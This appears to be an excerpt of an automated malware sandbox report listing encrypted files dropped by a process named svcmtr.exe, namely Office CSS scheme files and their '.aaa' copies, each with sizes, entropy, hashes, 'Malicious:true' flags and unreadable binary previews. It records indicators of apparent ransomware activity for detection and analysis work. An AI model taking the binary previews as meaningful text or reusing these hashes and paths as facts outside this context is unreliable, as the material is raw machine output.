                                                                                                                          SHA1:3AF7043320730C17D450C0BB7DDA8D152CD5C84F
                                                                                                                          SHA-256:178DB582130153DD924023DF489118E4F193C9A9F530E9C736AF6FA1F0C795F5
                                                                                                                          SHA-512:316328415C68BA5F85E7AACF9C4D7A79A89BEE1E8AF5EBDFCB7BD6A974129B99AEA5E81895BD66B36D76A43C3DAEAFE4EBAAE88A61C511E2AD7E7BFF032F43FB
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....H._.h[.3c\.S.\.....c..5.NI.'._..w.o.=;LKc.t..as[..5..k..K..a...(..d./N2+:.i...pQ]..G.I..A0..Y.q.........c.C.1...#..`.B`T......a.$...:..../O..5Q..a.A-4........#...?H..4.@9...+vy...5o.ew;..a..:ot.c.l.I..........]+..6.0.8...)J.z:l.@.mnA...D...\...y...2..mL.1E>...&4....6....q.]..}WZ...4m.....BX..?.....k.p......%....B.`.....m.aF^.....9..x6.o........,>..[...>..\j)..f.Y..|.LB..^.*..t..NmDA4..........2.P.W.J...9....>.......x"O}..h.......w.....JPn....L...r..jp...L......d..m......n.imS4....gK.$....;p.....}.{y...8?....[.a~.O6.F./.d..e2.Ln:W....*.@C.Y.....+....yupn..0$...rS.'....J..ry..;.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME16.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129486
                                                                                                                          Entropy (8bit):7.998590767033311
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:BZkMKfquDs5CTafV7J9Tkik88JlGfNiLqexQ7e+:BmMKS0AfVN9TkikhlGfNOqexQ6+
                                                                                                                          MD5:53A1B3D4391C07CEECC105D41E8A8467
                                                                                                                          SHA1:0C5C3DF949C1F0E4E044EEA3E29590C0185BE866
                                                                                                                          SHA-256:CA984678D10B6F3F2BFB2441E4804F298BB14DC3756B2CDBD80687133E8B915A
                                                                                                                          SHA-512:1A0B6B5CB978B5C357A2C31E7E236172395B9E283C88F2EBF2B9E7722E40F940012CC91D93D084B3DA45364BB6A0D10A1D719660200D4F65EC6296E5FF32085A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...]k'..z...=.....".....!%..},%..0.]g.Cs..g...?......wl.9..{.j\...u.F.....,"....C..........Q.(....C..k^..^...Oo.y.^.(.W...F.6.R~.Z...Nc....{..{....W.[..-..p`..)...e'.6G...ro..r.E...j N..*o@.CJlxH........h$.P.s.{T.b.3CIR..-DZ.......G.n.......$.0Z..nL........}......;..L.q._.....(B..(..E....&..;..?F.D.=g....p9.tW.X.b.u...,..P.c.$.Fb.....[....c...[....:...rP.k..V....m..j;]..K..W+..7._.W.;.o..j..P.L......ro...,.....[..m...Z%......K..U....g....5..B.9.....H;..d.....P....d..)e.z=[.4....x..U.L...hYb.....9..#.y......rN`.C.mn....7...8=/n~.S.f~../J..8.l.~%\.C.p.I|.'.)(.M..~P...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME16.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129486
                                                                                                                          Entropy (8bit):7.998590767033311
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:BZkMKfquDs5CTafV7J9Tkik88JlGfNiLqexQ7e+:BmMKS0AfVN9TkikhlGfNOqexQ6+
                                                                                                                          MD5:53A1B3D4391C07CEECC105D41E8A8467
                                                                                                                          SHA1:0C5C3DF949C1F0E4E044EEA3E29590C0185BE866
                                                                                                                          SHA-256:CA984678D10B6F3F2BFB2441E4804F298BB14DC3756B2CDBD80687133E8B915A
                                                                                                                          SHA-512:1A0B6B5CB978B5C357A2C31E7E236172395B9E283C88F2EBF2B9E7722E40F940012CC91D93D084B3DA45364BB6A0D10A1D719660200D4F65EC6296E5FF32085A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...]k'..z...=.....".....!%..},%..0.]g.Cs..g...?......wl.9..{.j\...u.F.....,"....C..........Q.(....C..k^..^...Oo.y.^.(.W...F.6.R~.Z...Nc....{..{....W.[..-..p`..)...e'.6G...ro..r.E...j N..*o@.CJlxH........h$.P.s.{T.b.3CIR..-DZ.......G.n.......$.0Z..nL........}......;..L.q._.....(B..(..E....&..;..?F.D.=g....p9.tW.X.b.u...,..P.c.$.Fb.....[....c...[....:...rP.k..V....m..j;]..K..W+..7._.W.;.o..j..P.L......ro...,.....[..m...Z%......K..U....g....5..B.9.....H;..d.....P....d..)e.z=[.4....x..U.L...hYb.....9..#.y......rN`.C.mn....7...8=/n~.S.f~../J..8.l.~%\.C.p.I|.'.)(.M..~P...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME17.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126078
                                                                                                                          Entropy (8bit):7.998172839977404
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:OXf59EuoaR/j3d0BvhXzCZEFCGVqFcmW0Nb00d:Id8zCZkCgcW0H
                                                                                                                          MD5:C5FC860D94F04CDC44269640CD8149F9
                                                                                                                          SHA1:B4185A435576F9ED6D4657AE5748C97AFD1B044C
                                                                                                                          SHA-256:4504A7F58BE053D1B6C69405E6F7FA6D36462308C48A3058B726DE6C0DC12F53
                                                                                                                          SHA-512:6EE642C4CB6F8C9FC129DA35D026E5240616D9572FEA287D0323C1BE873AB962D1639B7EEA58EB9EF7D061A36934F1770F0C36A80E365E1A09DD5A7EBAE06628
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......`:.....:.Q-......1...,.w...v..Tb.UA.zC.h..:.b.F.O.F.w.Yd.v.;rP.,.e.Y.2t.:.T=.....Z........x~..Z...HU.^F..}.%/....B....N..B...P...N.G...o....m....z.......Kvc..d......s.%:|....).j.w .RL......A)8...v.m.|...A..H....'.\.I..mk:.JR..,%r.MX.8......7._.%....!.q.+..L...-....4.;...}.......9<.K.d.S.$S.1.3.g..%.].0Rw.a..z.&@..]....GS.b.T..Ft..}.j.5..._.s...2..y.`.KBFz[c$...D.h.(..eJ...Uiig.NWEf..V.1%...u.4..Ix.bK....m..k..M:-...2[...k~.....w.<.-.......z-.gA.9[U......=".B...\...*x...@I.cZ..nV.=m...|..x..q..h6.0.tj .,.{....)....i....t.Q!..{.B...'..z......]...0.]..v......Bo.2n.p~yS}....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME17.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126078
                                                                                                                          Entropy (8bit):7.998172839977404
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:OXf59EuoaR/j3d0BvhXzCZEFCGVqFcmW0Nb00d:Id8zCZkCgcW0H
                                                                                                                          MD5:C5FC860D94F04CDC44269640CD8149F9
                                                                                                                          SHA1:B4185A435576F9ED6D4657AE5748C97AFD1B044C
                                                                                                                          SHA-256:4504A7F58BE053D1B6C69405E6F7FA6D36462308C48A3058B726DE6C0DC12F53
                                                                                                                          SHA-512:6EE642C4CB6F8C9FC129DA35D026E5240616D9572FEA287D0323C1BE873AB962D1639B7EEA58EB9EF7D061A36934F1770F0C36A80E365E1A09DD5A7EBAE06628
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......`:.....:.Q-......1...,.w...v..Tb.UA.zC.h..:.b.F.O.F.w.Yd.v.;rP.,.e.Y.2t.:.T=.....Z........x~..Z...HU.^F..}.%/....B....N..B...P...N.G...o....m....z.......Kvc..d......s.%:|....).j.w .RL......A)8...v.m.|...A..H....'.\.I..mk:.JR..,%r.MX.8......7._.%....!.q.+..L...-....4.;...}.......9<.K.d.S.$S.1.3.g..%.].0Rw.a..z.&@..]....GS.b.T..Ft..}.j.5..._.s...2..y.`.KBFz[c$...D.h.(..eJ...Uiig.NWEf..V.1%...u.4..Ix.bK....m..k..M:-...2[...k~.....w.<.-.......z-.gA.9[U......=".B...\...*x...@I.cZ..nV.=m...|..x..q..h6.0.tj .,.{....)....i....t.Q!..{.B...'..z......]...0.]..v......Bo.2n.p~yS}....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME18.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):132574
                                                                                                                          Entropy (8bit):7.998728436953894
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:mEnv1DzJAvHWfaR03+b9zmqiVJ6mL69yclO:m6v9zJkWSa3Izqr6NO
                                                                                                                          MD5:D18594C3394674413B6C2653E24D40D7
                                                                                                                          SHA1:7DDB34436954342F9C1152441C52F4A055CD235C
                                                                                                                          SHA-256:E7BA6C0C42EC7E01390E9D612C9FFB2D5C89F441A8E7746E7D50492DA67E62D2
                                                                                                                          SHA-512:C00FF32915660DB2D1E787DB500F4F4DCAE83936114998E6BE460EBDF1B98A7F8B5F27CF838B3C8AFE1503F0DCB6F991C995103AED1C12503DA685BA7F724790
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...|.2J..yn....a+8...#...9..+fK:.g.|.xm.U.......b.k..)....E....[)..L..m.7O..u6[@...&P.F@W.vLXM.;.....Ue..M)..S3.b.#...t.0...un>.......jT.yX..\.<5....'...A............E..{.B.m.......Q.~...............iS.=.e.vX..*..Pu..9.=.....R!.T..b..<]..jX..p\...-..;...}...).....EWg{..W?...~,._..........E.Z.`v..{K..\....p.U..{.s....yO..N/=........[...t..p..]E$.If.....X.sQ-..VH4..XZR|....Nn.'.qq..Q..@).,...{R;..U.......,.....?..w-...x..m...y5............l...1....kW...!.m5..R.T6..K."B.y(...f"J4q.....32H#.eoq.r.....E....W_P.._....2'.......m60BX.s..v...AR.N.:...I..........)..@..t.......U..,.RkB.g

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME18.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):132574
                                                                                                                          Entropy (8bit):7.998728436953894
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:mEnv1DzJAvHWfaR03+b9zmqiVJ6mL69yclO:m6v9zJkWSa3Izqr6NO
                                                                                                                          MD5:D18594C3394674413B6C2653E24D40D7
                                                                                                                          SHA1:7DDB34436954342F9C1152441C52F4A055CD235C
                                                                                                                          SHA-256:E7BA6C0C42EC7E01390E9D612C9FFB2D5C89F441A8E7746E7D50492DA67E62D2
                                                                                                                          SHA-512:C00FF32915660DB2D1E787DB500F4F4DCAE83936114998E6BE460EBDF1B98A7F8B5F27CF838B3C8AFE1503F0DCB6F991C995103AED1C12503DA685BA7F724790
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...|.2J..yn....a+8...#...9..+fK:.g.|.xm.U.......b.k..)....E....[)..L..m.7O..u6[@...&P.F@W.vLXM.;.....Ue..M)..S3.b.#...t.0...un>.......jT.yX..\.<5....'...A............E..{.B.m.......Q.~...............iS.=.e.vX..*..Pu..9.=.....R!.T..b..<]..jX..p\...-..;...}...).....EWg{..W?...~,._..........E.Z.`v..{K..\....p.U..{.s....yO..N/=........[...t..p..]E$.If.....X.sQ-..VH4..XZR|....Nn.'.qq..Q..@).,...{R;..U.......,.....?..w-...x..m...y5............l...1....kW...!.m5..R.T6..K."B.y(...f"J4q.....32H#.eoq.r.....E....W_P.._....2'.......m60BX.s..v...AR.N.:...I..........)..@..t.......U..,.RkB.g

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME19.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131486
                                                                                                                          Entropy (8bit):7.998538164018805
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:/j6HVBOP2N7xGFQj8V1RHG5g+UiAq6Ca/wXEtR+nMmAj:gh7EqjK1RHPXw6Crjhi
                                                                                                                          MD5:7FD9A56F0126A97D908FD0A17A9AFD51
                                                                                                                          SHA1:8DCB3E83B72767A9777014BC968754F42B3B7DB7
                                                                                                                          SHA-256:675A892F58FF35AFABFC1F105AC697A9D3C873EF3CF1FF28560837C1CFA9BF48
                                                                                                                          SHA-512:D51C4C2E8AC1C7D09080CD49244575B3EB85162937058115B52DB863524B64D7800B84D3045B02831B52746DD79AF79A64030F62B3A2E630FAB7608C4BF596B4
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..U..FF..H.&.1..:....H.9f.%K.[m..`(...K0&8.CU.r....w....KO...U..e9.G..C..J.v.:..TiQ.>].,...7u.G<............*.X...M.g@.4:.X.6.r...o.....z7*.(z....dc.C]..?b.1.TT.4...]:.C/.|..d...V....IB..#F+G.SiS......r&..9.{"*D.zT"M.(....@..[..!.a.X*.+7.3t.%.....60..`.......]Z.Q.s....!...c".M.9.~.'t....5.4...d..;)..g..Nx..T...W.>..PT/......BB.X......j...t0R.=r.dAn-.c.....P........,.W........jr.L.(.h........+"Q.>@i.<._.?...3.....[..y......c#...S.r...L...^OX.....p9.6..i1..x....|.O?S.C.E.<.. \`..p.D.c...X...'"..T.......{{.gr.y..z......j..\..K.o...ZJ'j......_d.Ki.%...F.J.|b..o.?..F.......b.....-...^.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME19.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131486
                                                                                                                          Entropy (8bit):7.998538164018805
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:/j6HVBOP2N7xGFQj8V1RHG5g+UiAq6Ca/wXEtR+nMmAj:gh7EqjK1RHPXw6Crjhi
                                                                                                                          MD5:7FD9A56F0126A97D908FD0A17A9AFD51
                                                                                                                          SHA1:8DCB3E83B72767A9777014BC968754F42B3B7DB7
                                                                                                                          SHA-256:675A892F58FF35AFABFC1F105AC697A9D3C873EF3CF1FF28560837C1CFA9BF48
                                                                                                                          SHA-512:D51C4C2E8AC1C7D09080CD49244575B3EB85162937058115B52DB863524B64D7800B84D3045B02831B52746DD79AF79A64030F62B3A2E630FAB7608C4BF596B4
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..U..FF..H.&.1..:....H.9f.%K.[m..`(...K0&8.CU.r....w....KO...U..e9.G..C..J.v.:..TiQ.>].,...7u.G<............*.X...M.g@.4:.X.6.r...o.....z7*.(z....dc.C]..?b.1.TT.4...]:.C/.|..d...V....IB..#F+G.SiS......r&..9.{"*D.zT"M.(....@..[..!.a.X*.+7.3t.%.....60..`.......]Z.Q.s....!...c".M.9.~.'t....5.4...d..;)..g..Nx..T...W.>..PT/......BB.X......j...t0R.=r.dAn-.c.....P........,.W........jr.L.(.h........+"Q.>@i.<._.?...3.....[..y......c#...S.r...L...^OX.....p9.6..i1..x....|.O?S.C.E.<.. \`..p.D.c...X...'"..T.......{{.gr.y..z......j..\..K.o...ZJ'j......_d.Ki.%...F.J.|b..o.?..F.......b.....-...^.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME20.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129182
                                                                                                                          Entropy (8bit):7.9985096622446505
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:YvR/m31nKiP2vUECm9uPuEzV5V0C3LOVMD5oVcTVZeCH+K4:Yp/m31ocECDN9ScTeb
                                                                                                                          MD5:0E03564A1FC6781F59C5C82CBE8A3265
                                                                                                                          SHA1:EB6F31199896D810803B5F05217CB3BA7DA8CD40
                                                                                                                          SHA-256:4BD58FDDEECDEF783264D56178D2891FF54432E8AFEDDB60CBE76D77D132D435
                                                                                                                          SHA-512:BDC34498DEDBEA7DDB0F0FEA5840BF19E2EA9D8765F49CA632602FCC98F126AF2ED1DDF4CB4160D0D4B7159F39AC3C8F30D859EBFD2B20E00409047EC525BFB0
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..6..].....q.^..S......N......)t.K...I...N.....eC.8.G1[X....}M4.n...z.Q&..b....?..S..9.WW.._#.K.R.$}.6....8z......*.r.n...M.r.G...o..b...(.}..^H(i$G.06.,Op.3.m...!<f?5.".E.s.a<..Ek..g.......p.o....n..#.%(.......$..7....U....FVg2..+.L.....=y.7.X'.<..4V......4I...j.`....cJC.....JW:..P....rf....6.5\..8h.C4*E.`....ix?...%.K...7.w.d.c%Q.........qg>}....F....t...~.|%.-....D4.ytw.....-...Q<|.#..1.7..RZ=..Ya..!...d..Z.1tPV.%.3..d....c.[H..~...[.L.or-h...O.U......=(...~.?.<a..{r...<....[..U..."........$...c...0Gg...........Q........5yZC$..L....H67z..Q..Vf.......3.J....I......

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME20.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129182
                                                                                                                          Entropy (8bit):7.9985096622446505
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:YvR/m31nKiP2vUECm9uPuEzV5V0C3LOVMD5oVcTVZeCH+K4:Yp/m31ocECDN9ScTeb
                                                                                                                          MD5:0E03564A1FC6781F59C5C82CBE8A3265
                                                                                                                          SHA1:EB6F31199896D810803B5F05217CB3BA7DA8CD40
                                                                                                                          SHA-256:4BD58FDDEECDEF783264D56178D2891FF54432E8AFEDDB60CBE76D77D132D435
                                                                                                                          SHA-512:BDC34498DEDBEA7DDB0F0FEA5840BF19E2EA9D8765F49CA632602FCC98F126AF2ED1DDF4CB4160D0D4B7159F39AC3C8F30D859EBFD2B20E00409047EC525BFB0
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..6..].....q.^..S......N......)t.K...I...N.....eC.8.G1[X....}M4.n...z.Q&..b....?..S..9.WW.._#.K.R.$}.6....8z......*.r.n...M.r.G...o..b...(.}..^H(i$G.06.,Op.3.m...!<f?5.".E.s.a<..Ek..g.......p.o....n..#.%(.......$..7....U....FVg2..+.L.....=y.7.X'.<..4V......4I...j.`....cJC.....JW:..P....rf....6.5\..8h.C4*E.`....ix?...%.K...7.w.d.c%Q.........qg>}....F....t...~.|%.-....D4.ytw.....-...Q<|.#..1.7..RZ=..Ya..!...d..Z.1tPV.%.3..d....c.[H..~...[.L.or-h...O.U......=(...~.?.<a..{r...<....[..U..."........$...c...0Gg...........Q........5yZC$..L....H67z..Q..Vf.......3.J....I......

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME21.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126094
                                                                                                                          Entropy (8bit):7.998341863834458
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:K9mvgkz6W7lSWmaHC0z05yv6rZAx4NEwJfZ+cmiAMaVG:EmvTz6QxmaLvv+BJfwG4G
                                                                                                                          MD5:5301548BF40628A60777346D2908CDE3
                                                                                                                          SHA1:33EA9A7703006AAAFC95A540D341CBDEAF91EAAA
                                                                                                                          SHA-256:66DE68FB1F595049D598FCE35D13D9CA8312E5F8341765E23097B1DBF81B6C12
                                                                                                                          SHA-512:F8037D7DD180B31381759CE4610371E2B945B13A8CE52E8C2E1D0D51E43F4E55C3321D1A830A5D60D0A387C1E96B6913190BAD0735A1AC0CC2F7B21DB29BFAA7
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......N.5;.D..8....eG7l'V..K....u..)6*.q5;b....4..AX.K....e......vq)P.6.W.u...B...:[.9..".....3.......Q.9q{(....BZ(m.2...P..;*.(.....qt.....{).".-}...f...+M!...,.6..}.a.Q(........2....'"....mL.@..E... %...].=.P....K....8.q9h...F...'...:..F7Le.9O..P.....Q.bd.8le.FOg...<...).d"ny.j.i.`.p....hy.@|I.|....A.._@..6...A..2cT......a.70t.:....I.D..'.!X9...d.c..{...lg..?N.<.g.b.7..\'Jr.i.l.Xi.#..o.=.]..g4....5...9.s.....UnLF....u.L..Z%".T.);...<F.H.F....a.\....K.".m....p.Y..~..z...."d..oQ.z.2w.Up...`<.j..z.X..i...JKm..C.........0....h.....}?[..5D.1..9..z1..y...q.xG.).~....2.p.I.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME21.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126094
                                                                                                                          Entropy (8bit):7.998341863834458
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:K9mvgkz6W7lSWmaHC0z05yv6rZAx4NEwJfZ+cmiAMaVG:EmvTz6QxmaLvv+BJfwG4G
                                                                                                                          MD5:5301548BF40628A60777346D2908CDE3
                                                                                                                          SHA1:33EA9A7703006AAAFC95A540D341CBDEAF91EAAA
                                                                                                                          SHA-256:66DE68FB1F595049D598FCE35D13D9CA8312E5F8341765E23097B1DBF81B6C12
                                                                                                                          SHA-512:F8037D7DD180B31381759CE4610371E2B945B13A8CE52E8C2E1D0D51E43F4E55C3321D1A830A5D60D0A387C1E96B6913190BAD0735A1AC0CC2F7B21DB29BFAA7
                                                                                                                          Malicious:true
